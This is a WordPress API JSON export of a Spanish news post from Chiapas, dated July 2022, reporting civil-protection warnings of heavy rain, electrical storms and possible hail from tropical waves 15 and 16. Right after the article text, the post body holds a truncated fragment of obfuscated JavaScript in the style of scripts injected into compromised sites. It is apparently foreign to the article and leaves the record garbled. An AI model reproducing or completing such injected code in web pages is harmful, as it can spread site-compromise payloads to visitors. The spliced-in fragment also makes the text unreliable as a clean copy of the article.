{"id":3880,"date":"2022-07-25T23:20:36","date_gmt":"2022-07-25T23:20:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3880"},"modified":"2022-07-25T23:20:37","modified_gmt":"2022-07-25T23:20:37","slug":"alertan-por-lluvias-fuetes-y-muy-fuertes-para-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3880","title":{"rendered":"Alertan por lluvias fuetes y muy fuertes para Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"640\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220725-WA0004-1024x640.jpg\" alt=\"\" class=\"wp-image-3881\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220725-WA0004-1024x640.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220725-WA0004-300x187.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220725-WA0004-768x480.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220725-WA0004.jpg 1140w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores. Agencia ReporteCiudadano, 25 de julio del 2022. Tuxtla Guti\u00e9rrez.- El secretario de Protecci\u00f3n Civil Municipal en Tuxtla Guti\u00e9rrez, Eder Fabi\u00e1n Mancilla, secretario de Protecci\u00f3n inform\u00f3 que, la Onda Tropical N\u00famero 15 dejar\u00e1 lluvias fuertes en 11 regiones de Chiapas y muy fuertes en tres m\u00e1s.Precis\u00f3 que, para este lunes, la onda tropical n\u00famero 15, recorrer\u00e1 los estados del sur y pac\u00edfico mexicano, se asociar\u00e1 con una zona de baja presi\u00f3n con potencial cicl\u00f3nico lo que ocasionar\u00e1 lluvias fuertes y chubascos en Chiapas.Por otra parte, la Onda Tropical n\u00famero 16, se desplaza por la Pen\u00ednsula de Yucat\u00e1n, lo que generar\u00e1 chubascos en esa porci\u00f3n del pa\u00eds.\u201cActualmente el sistema de Alertamiento por Lluvias, de la Secretar\u00eda de Protecci\u00f3n civil, destaca que, m\u00e1s de la mitad del estado se encuentra en alerta azul, con lluvias fuertes en la zona Norte, Maya, Tulij\u00e1, Mezcalapa, Valle Zoque, Los Bosques, Altos, Meseta Comiteca, Metropolitana, Frailesca y Selva Lacandona\u201d, coment\u00f3. Agreg\u00f3 que:  \u201cCon lluvias muy fuertes, las regiones Soconusco, Istmo Costa y Sierra Mariscal. Estas lluvias estar\u00e1n acompa\u00f1adas con actividad el\u00e9ctrica, rachas de viento y posible ca\u00edda de granizo, adem\u00e1s de que podr\u00edan incrementar los niveles de los r\u00edos\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. Agencia ReporteCiudadano, 25 de julio del 2022. Tuxtla Guti\u00e9rrez.- El secretario de Protecci\u00f3n Civil Municipal en Tuxtla Guti\u00e9rrez, Eder Fabi\u00e1n Mancilla, secretario de Protecci\u00f3n inform\u00f3 que, la Onda Tropical N\u00famero 15 dejar\u00e1 lluvias fuertes en 11 regiones de Chiapas y muy fuertes en tres m\u00e1s.Precis\u00f3 que, para este lunes, la onda tropical n\u00famero &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3881,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-3880","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3880","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3880"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3880\/revisions"}],"predecessor-version":[{"id":3882,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3880\/revisions\/3882"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3881"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3880"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3880"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3880"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}